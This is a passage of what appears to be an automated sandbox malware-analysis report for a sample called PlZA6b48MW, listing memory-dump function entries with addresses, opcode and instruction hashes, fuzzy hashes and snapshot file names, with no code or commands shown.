                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 065f05585d45e053d1b5db565d13ff856d3d9b75273762aa9917130e70dcbd4a
                                                                            • Instruction ID: 05478e40f41d301d69690782fcc422bf67ea874b5e35c4000e79748e4a6d5a7b
                                                                            • Opcode Fuzzy Hash: 065f05585d45e053d1b5db565d13ff856d3d9b75273762aa9917130e70dcbd4a
                                                                            • Instruction Fuzzy Hash: 6A012820B1DE6A5FD719A77058258BABB90EF4525474006BAE08FCB5D3EE286509C390
                                                                            Function 00007FFD9B890C48 Relevance: .0, Instructions: 45COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000002D.00000002.2140255132.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_45_2_7ffd9b890000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 437e1216d7290af1d35a23d226ee9eed84ddb34adc2982f9d506b3b0166aedbc
                                                                            • Instruction ID: 1fd37f9b07e7def139029a6b6d8896c438d2d5f381d179c4b09afdc72492a014
                                                                            • Opcode Fuzzy Hash: 437e1216d7290af1d35a23d226ee9eed84ddb34adc2982f9d506b3b0166aedbc
                                                                            • Instruction Fuzzy Hash: 7701C031E1E38DCFEB12DBA4886009D7FB0EF06704F0641F7D054CB2A2D93866458780
                                                                            Function 00007FFD9B896C1A Relevance: .0, Instructions: 39COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000002D.00000002.2140255132.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_45_2_7ffd9b890000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 08cd4e192d540719e76ca88b8a3f2384da11a8f73a2bb982fdeaaa9e84ca6c44
                                                                            • Instruction ID: 437ce64e689d825df0bb718152093c5aa3a86df1a8478521694c372b529c3fde
                                                                            • Opcode Fuzzy Hash: 08cd4e192d540719e76ca88b8a3f2384da11a8f73a2bb982fdeaaa9e84ca6c44
                                                                            • Instruction Fuzzy Hash: F601F434A08A19CFCB65EF54C495AA977B1FB6C300F5105A9D00ED7261DA34AA45CB81
                                                                            Function 00007FFD9B893696 Relevance: .0, Instructions: 39COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000002D.00000002.2140255132.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_45_2_7ffd9b890000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 65e8be95179b52e3161798d2a7ed0564b4310aa8133acfcddd3b2d38e3e24a30
                                                                            • Instruction ID: ce17355680c429130fca8a036ad5a48a6d40c8126350f48acf74a17cbfb9bdc7
                                                                            • Opcode Fuzzy Hash: 65e8be95179b52e3161798d2a7ed0564b4310aa8133acfcddd3b2d38e3e24a30
                                                                            • Instruction Fuzzy Hash: 72013631A1D51E8AEF75EB54CC646F877A1EB58311F1601B9C48ED32A1CE386AC18A00
                                                                            Function 00007FFD9BC84E82 Relevance: .0, Instructions: 39COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000002D.00000002.2254952659.00007FFD9BC80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC80000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_45_2_7ffd9bc80000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: bacac09a51c66ef4fe4868848e403cf943d398afb95b01e858408027756f08c1
                                                                            • Instruction ID: 12adb7f304d34ae5a454b5c3a14b01775f26117f0f382c8c1aaecb364f38ed39
                                                                            • Opcode Fuzzy Hash: bacac09a51c66ef4fe4868848e403cf943d398afb95b01e858408027756f08c1
                                                                            • Instruction Fuzzy Hash: 56F0623154F7C9AFD7229BB088614997FA4AF43214B1A01FAD485C70A2C52C6746C761
                                                                            Function 00007FFD9BC86678 Relevance: .0, Instructions: 35COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000002D.00000002.2254952659.00007FFD9BC80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC80000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_45_2_7ffd9bc80000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 719cc16744a554d91eab0cd70ff1fe89cce7763366a0cee3003b5c7c6b34ef80
                                                                            • Instruction ID: 3764d2d15ced36f4bf8aa6a1f25ad66a6be6f8c3c1a1b46d8eed8d3b8c41fbbb
                                                                            • Opcode Fuzzy Hash: 719cc16744a554d91eab0cd70ff1fe89cce7763366a0cee3003b5c7c6b34ef80
                                                                            • Instruction Fuzzy Hash: 65F0BE10B0FD4F8AFA3556F0A4311BD26109F42351F22013AE80F862E2CD393B4153A2
                                                                            Function 00007FFD9BC85F64 Relevance: .0, Instructions: 33COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000002D.00000002.2254952659.00007FFD9BC80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC80000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_45_2_7ffd9bc80000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 3ea621a765ef49194e07608aa86e42c97a74f53b594dcfb5397ad9cea3ff005a
                                                                            • Instruction ID: 07a1848666538824d79ede457a7c67e2c997309e445c79a41d06c3b8946880e1
                                                                            • Opcode Fuzzy Hash: 3ea621a765ef49194e07608aa86e42c97a74f53b594dcfb5397ad9cea3ff005a
                                                                            • Instruction Fuzzy Hash: 76F03721F1FC5F4EF77552F8183407C15A14B45250B16057AE84BCB2F2EC9C7E515395
                                                                            Function 00007FFD9BC80F5C Relevance: .0, Instructions: 31COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000002D.00000002.2254952659.00007FFD9BC80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC80000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_45_2_7ffd9bc80000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 71ad726d5a77e6c61502c7a456a7c1efda4266fa0a03b2f0f4fb76add4abd4c4
                                                                            • Instruction ID: 5a9558f2aafb0a26c4782f796fd54343d6abef6587326fa7082bff7340f4aad8
                                                                            • Opcode Fuzzy Hash: 71ad726d5a77e6c61502c7a456a7c1efda4266fa0a03b2f0f4fb76add4abd4c4
                                                                            • Instruction Fuzzy Hash: 04E06D21F2FC5F4AF77862F814314BC04429B88E51F664135E40FC62E6EC5C6F4512D5
                                                                            Function 00007FFD9B8963FD Relevance: .0, Instructions: 22COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000002D.00000002.2140255132.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_45_2_7ffd9b890000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 6dd9cd3213a896cf790c4d9ce7bc352bba50e1bed93a52f4d2e193527653a186
                                                                            • Instruction ID: e6397178bc4292fa0b9ca088e922dd98f30acc7aadac7330f992f7dc7fbe1655
                                                                            • Opcode Fuzzy Hash: 6dd9cd3213a896cf790c4d9ce7bc352bba50e1bed93a52f4d2e193527653a186
                                                                            • Instruction Fuzzy Hash: 8BE0E521E0A51A87FFA4A384CC60BB96665EB98300F1501B8D90EA33D1CD28AF40CA45
                                                                            Function 00007FFD9B890B95 Relevance: .0, Instructions: 19COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000002D.00000002.2140255132.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_45_2_7ffd9b890000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: cd0543b9d0adc4329eb618c7f976545b6d033392820df751358e15f734ce46fd
                                                                            • Instruction ID: 6413287aedd0aeb93b449367b3086a3e4f91dc163e2ac3ab1b3641e4ea5a8c19
                                                                            • Opcode Fuzzy Hash: cd0543b9d0adc4329eb618c7f976545b6d033392820df751358e15f734ce46fd
                                                                            • Instruction Fuzzy Hash: BDD0A73061954E8FFA01F778D8499547FD0FB1F211BD910E1D008C7561D50589558B00
                                                                            Function 00007FFD9BC80B87 Relevance: .0, Instructions: 18COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000002D.00000002.2254952659.00007FFD9BC80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC80000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_45_2_7ffd9bc80000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: ddd55d87009186046bb0301cad9b96ee5516376b7bcd16ca8595e1d739dbb84c
                                                                            • Instruction ID: ab53f0c5f3856e27737abb2053491b69da78d9b86c6e1d7dfea17940693429a0
                                                                            • Opcode Fuzzy Hash: ddd55d87009186046bb0301cad9b96ee5516376b7bcd16ca8595e1d739dbb84c
                                                                            • Instruction Fuzzy Hash: 74E01D41F0E78E5BD73606B404715781E919F17744F5606F6D5454D1E3D96839445311
                                                                            Function 00007FFD9B8906A5 Relevance: .0, Instructions: 13COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000002D.00000002.2140255132.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_45_2_7ffd9b890000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: edd84586ca2309a73ea2e425c3da0eb4cf66a5a33340d999415eb4e510eeee48
                                                                            • Instruction ID: f2ba7abffe63c8899a274807f2a40b32c72ce499144457c3fd6ab61ca92fe777
                                                                            • Opcode Fuzzy Hash: edd84586ca2309a73ea2e425c3da0eb4cf66a5a33340d999415eb4e510eeee48
                                                                            • Instruction Fuzzy Hash: 21C04C06F6B61F01FC3677EE9C660ACA9446FDDF10FDB0172D64D500E1AD4D22D60156
                                                                            Function 00007FFD9B890B18 Relevance: .0, Instructions: 12COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000002D.00000002.2140255132.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_45_2_7ffd9b890000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: b06f1791d9c404b6da8188d13b2bf43d86fda8b6c16fb441b2d0ee5fe7e0b47f
                                                                            • Instruction ID: 1101dc33c6c077c607539071ca5491d8eac998aacc37a07c3eaf30fccf85f39d
                                                                            • Opcode Fuzzy Hash: b06f1791d9c404b6da8188d13b2bf43d86fda8b6c16fb441b2d0ee5fe7e0b47f
                                                                            • Instruction Fuzzy Hash: EFC08C305118088FCA00FB2DC98480036E0FB0E210BC20090E40DC7170E21ADC80C700
                                                                            Function 00007FFD9B890708 Relevance: .0, Instructions: 12COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000002D.00000002.2140255132.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_45_2_7ffd9b890000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 2f6d768d52db0de072cd9d8697469d67e80ecdc4b026ab0b8af17efe8a05b681
                                                                            • Instruction ID: ba52895a6d597aa163f16de3376854e74ecc50fff4a24c5bdf24e95157a358a2
                                                                            • Opcode Fuzzy Hash: 2f6d768d52db0de072cd9d8697469d67e80ecdc4b026ab0b8af17efe8a05b681
                                                                            • Instruction Fuzzy Hash: 04C04C305218098FC954E76EC9899547AA0FB0D205BD610D0E409CB171E65A99548B45
                                                                            Function 00007FFD9B891280 Relevance: .0, Instructions: 12COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000002D.00000002.2140255132.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_45_2_7ffd9b890000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 3265276eb29e93b0456f4b63c2112c0fba9dc83055499a3600fa307922ce2c4c
                                                                            • Instruction ID: 47343c8f396439e268f48578affa61f2658bd6f94dcca19a8f33a1801d29b18a
                                                                            • Opcode Fuzzy Hash: 3265276eb29e93b0456f4b63c2112c0fba9dc83055499a3600fa307922ce2c4c
                                                                            • Instruction Fuzzy Hash: C2C04C3455180D9FC958EB69C89591477A0FB1D315BD60090E409C7171D669DDD5C741
                                                                            Function 00007FFD9BC8166B Relevance: .0, Instructions: 11COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000002D.00000002.2254952659.00007FFD9BC80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC80000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_45_2_7ffd9bc80000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 2db0abfd7043c5346f8301486abd97a43e4486f59773c0113c882262dc8c6a12
                                                                            • Instruction ID: 629f6461c4b36ca7b861ddef43af156b0c49fbbc3f788ec2fd8e563ae149d728
                                                                            • Opcode Fuzzy Hash: 2db0abfd7043c5346f8301486abd97a43e4486f59773c0113c882262dc8c6a12
                                                                            • Instruction Fuzzy Hash: 89D09210B0F96F85F2384BF1407123D59E49F19300F6B0439D09F419E1C9387A016612
                                                                            Function 00007FFD9B891E15 Relevance: .0, Instructions: 10COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000002D.00000002.2140255132.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_45_2_7ffd9b890000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: aac819e78332f11c32da112df4029183b8fb8ee1eb76ed6f91aee2867ac452c7
                                                                            • Instruction ID: 73645866e56aa77ef3ddfd917a0e42b77c40c5fe153de3304e384252ed4fc096
                                                                            • Opcode Fuzzy Hash: aac819e78332f11c32da112df4029183b8fb8ee1eb76ed6f91aee2867ac452c7
                                                                            • Instruction Fuzzy Hash: AFC04C00F1D85E56F75AA614C5716BE48979B94798FD50174E01DC72CFCE1D59020287
                                                                            Function 00007FFD9B890540 Relevance: .0, Instructions: 9COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000002D.00000002.2140255132.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_45_2_7ffd9b890000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 2b78bf1186c45fc3c7d81c293246713ae118e9436eb60826fa9e68670449f7b4
                                                                            • Instruction ID: d188b72abd336879bfdc85e350170273d7c2f391426fd2a1b64518fe4c510848
                                                                            • Opcode Fuzzy Hash: 2b78bf1186c45fc3c7d81c293246713ae118e9436eb60826fa9e68670449f7b4
                                                                            • Instruction Fuzzy Hash: 0AB01230D6F70F42DE3C33F10952474F890AF0D204FD202B4D409401A1E86F52D68283
                                                                            Function 00007FFD9B8937E4 Relevance: .0, Instructions: 8COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000002D.00000002.2140255132.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_45_2_7ffd9b890000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 53c70a6c0ebeaaabb0c14e47e9f9b531c1a27ffe34ac2e4c652d76d0da44782b
                                                                            • Instruction ID: a1d3854d250ecc1df90a4f00d585ec1995221288377aea14f0568f1baa4b5fdc
                                                                            • Opcode Fuzzy Hash: 53c70a6c0ebeaaabb0c14e47e9f9b531c1a27ffe34ac2e4c652d76d0da44782b
                                                                            • Instruction Fuzzy Hash: 4AB02202E2E00C02EB30ABB088202BE32000F08308F0B80BA800AA3882CE2822020A00
                                                                            Function 00007FFD9B890520 Relevance: .0, Instructions: 8COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000002D.00000002.2140255132.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_45_2_7ffd9b890000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: d4c6600cef925dc529f846fc1ca0cc0fd5c55d5dfc1650271f53e3a99bc49c88
                                                                            • Instruction ID: 6f7ce818445713f7aa0e774c2beeaf29a64f186ae6dabf6f5b6d195629db34c2
                                                                            • Opcode Fuzzy Hash: d4c6600cef925dc529f846fc1ca0cc0fd5c55d5dfc1650271f53e3a99bc49c88
                                                                            • Instruction Fuzzy Hash: 97B00204D7740E55EC2433F51A5A06479506B4D524FD61570D41D801A5984F16A55592
                                                                            Function 00007FFD9B8906C8 Relevance: .0, Instructions: 8COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000002D.00000002.2140255132.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_45_2_7ffd9b890000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 96fe4010113da6c11f3e8a2dacffdcb6673fd4f3f15f9a27ae6a2de406a7b73a
                                                                            • Instruction ID: 2893ec6d549d1c5f3345732fc65bc504d818a10e303429f287afa0ea0ac843a5
                                                                            • Opcode Fuzzy Hash: 96fe4010113da6c11f3e8a2dacffdcb6673fd4f3f15f9a27ae6a2de406a7b73a
                                                                            • Instruction Fuzzy Hash: A4B01200D6740F01EC2433FB0C52064B8446B4C600FCA0170D80D50091A84D12950242
                                                                            Function 00007FFD9BC85B8F Relevance: .0, Instructions: 8COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000002D.00000002.2254952659.00007FFD9BC80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC80000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_45_2_7ffd9bc80000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 8207760634b0b7f9f6b1f4968ee5b0ba0c127692bd5b7ce818534984915b35f2
                                                                            • Instruction ID: 83bd5cf3320ad2f3f69481b569bf19b2fc2fea411dbbd217f932dc66fa759c96
                                                                            • Opcode Fuzzy Hash: 8207760634b0b7f9f6b1f4968ee5b0ba0c127692bd5b7ce818534984915b35f2
                                                                            • Instruction Fuzzy Hash: 03C09B44F0F74757EB3217F005B507D06610F553007570572D506891F3DDBC7E055251

                                                                            Executed Functions

                                                                            Function 00007FFD9B880D4C Relevance: 1.5, Strings: 1, Instructions: 259COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000002F.00000002.2427763799.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_47_2_7ffd9b880000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 5[_H
                                                                            • API String ID: 0-3279724263
                                                                            • Opcode ID: d481e3ac328daa1fc262905c76a5bad4ea4923477e62e03584f5b6d94554e6b5
                                                                            • Instruction ID: bacffcd5512e07b4a76097d778ce1dcc301f7b3612b8a153275e67ec36062321
                                                                            • Opcode Fuzzy Hash: d481e3ac328daa1fc262905c76a5bad4ea4923477e62e03584f5b6d94554e6b5
                                                                            • Instruction Fuzzy Hash: 7B912471A19A8D4FE799EB6888757A97BE1FF99310F4000BBD05AD73E6CB782401C711
                                                                            Function 00007FFD9B8C0C21 Relevance: 1.4, Strings: 1, Instructions: 192COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000002F.00000002.2427763799.00007FFD9B8B2000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B2000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_47_2_7ffd9b8b2000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: rL_H
                                                                            • API String ID: 0-3705031574
                                                                            • Opcode ID: 74997a95fcde87e7c2fef363ff88e8ee5a5a952e2af5fb68df709a1d66fdb93c
                                                                            • Instruction ID: 36c91304e000df97cde3fcbccdda7c3af2abf0b76e0d36108baed6915aa3b47d
                                                                            • Opcode Fuzzy Hash: 74997a95fcde87e7c2fef363ff88e8ee5a5a952e2af5fb68df709a1d66fdb93c
                                                                            • Instruction Fuzzy Hash: EF5149A1B2EA8E0FDFA9EB68982567977D1FF59740B0501FBD00DC71E7ED28A9018340
                                                                            Function 00007FFD9BC72188 Relevance: 1.4, Strings: 1, Instructions: 155COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000002F.00000002.2605908935.00007FFD9BC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC70000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_47_2_7ffd9bc70000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID: 0-3916222277
                                                                            • Opcode ID: 8052463f6c62f1f2aa4444131b97153b1d330801e2948b6ba4c70409e2f0a69d
                                                                            • Instruction ID: 331c2f98622196e4978c3791f3f18e07efcb69ff91e94c10f4a0c25885855d31
                                                                            • Opcode Fuzzy Hash: 8052463f6c62f1f2aa4444131b97153b1d330801e2948b6ba4c70409e2f0a69d
                                                                            • Instruction Fuzzy Hash: B1516271E1A54E8FDB69DBE8C4A55BCB7B1FF59300F1140BAD01AEB296DA346A01CB40
                                                                            Function 00007FFD9BC77198 Relevance: 1.4, Strings: 1, Instructions: 128COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000002F.00000002.2605908935.00007FFD9BC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC70000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_47_2_7ffd9bc70000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID: 0-3916222277
                                                                            • Opcode ID: d26c9152b5c0cc561e36a9e6ed5707217e30225bb42ff6ae51f74b2e79230f9f
                                                                            • Instruction ID: e9c99e5266a5e0683643fc663627c111a27fb6f65ff303d8e961000bef3a908f
                                                                            • Opcode Fuzzy Hash: d26c9152b5c0cc561e36a9e6ed5707217e30225bb42ff6ae51f74b2e79230f9f
                                                                            • Instruction Fuzzy Hash: 14411A70E1964E9FDB59DFA4C4A59BDB7B1FF44300F1140AED01AA72A6CA392A02CB50
                                                                            Function 00007FFD9B8B3AE9 Relevance: 1.3, Strings: 1, Instructions: 30COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000002F.00000002.2427763799.00007FFD9B8B2000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B2000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_47_2_7ffd9b8b2000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: M
                                                                            • API String ID: 0-3664761504
                                                                            • Opcode ID: aab9fef29f9b8c255aa64399f18a2c5f730d22e4959866d0c534b95991241652
                                                                            • Instruction ID: d9596c3f5642eca637aca59428efd02c59ead47a4caec7d45c71ffe3258c4756
                                                                            • Opcode Fuzzy Hash: aab9fef29f9b8c255aa64399f18a2c5f730d22e4959866d0c534b95991241652
                                                                            • Instruction Fuzzy Hash: 87F0A03060E7C44FC7169A3488294147F60EF6720034A52EFC045CF1A3DA188885C701
                                                                            Function 00007FFD9B8B2449 Relevance: 1.3, Strings: 1, Instructions: 29COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000002F.00000002.2427763799.00007FFD9B8B2000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B2000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_47_2_7ffd9b8b2000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: M
                                                                            • API String ID: 0-3664761504
                                                                            • Opcode ID: 62433507368095f3f450bc3d0274389146bc4b53b94bc5f151595d66101b0649
                                                                            • Instruction ID: 3ba3a033f659e64c71fc821e78dbcf484987b27617138e6128de792122def097
                                                                            • Opcode Fuzzy Hash: 62433507368095f3f450bc3d0274389146bc4b53b94bc5f151595d66101b0649
                                                                            • Instruction Fuzzy Hash: D9F0E57060F3C44FC71AAA7488288157F60EF6720034A42EFC085CF1E3DA1CD885C701
                                                                            Function 00007FFD9B8BB0C9 Relevance: 1.3, Strings: 1, Instructions: 29COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000002F.00000002.2427763799.00007FFD9B8B2000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B2000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_47_2_7ffd9b8b2000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: M
                                                                            • API String ID: 0-3664761504
                                                                            • Opcode ID: 12cbb1bcd3f0c2040fa9ba211ceb924aea3d7fc1e5f3a3aa9fc893922ffafc36
                                                                            • Instruction ID: 2b49d18c394addee507a1a95eb312cc845775e28e6b013493c184e79d5290e45
                                                                            • Opcode Fuzzy Hash: 12cbb1bcd3f0c2040fa9ba211ceb924aea3d7fc1e5f3a3aa9fc893922ffafc36
                                                                            • Instruction Fuzzy Hash: 1FF0307150F7D44FDB169A3488698547FA0EE6721174A52EFC045CB1A7DA199889C701
                                                                            Function 00007FFD9B8BF2A9 Relevance: 1.3, Strings: 1, Instructions: 26COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000002F.00000002.2427763799.00007FFD9B8B2000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B2000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_47_2_7ffd9b8b2000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: M
                                                                            • API String ID: 0-3664761504
                                                                            • Opcode ID: a740e1ec56bbb9088af0989fa77e2c33e66e0537d5d755b53a9ec9775ec2cca3
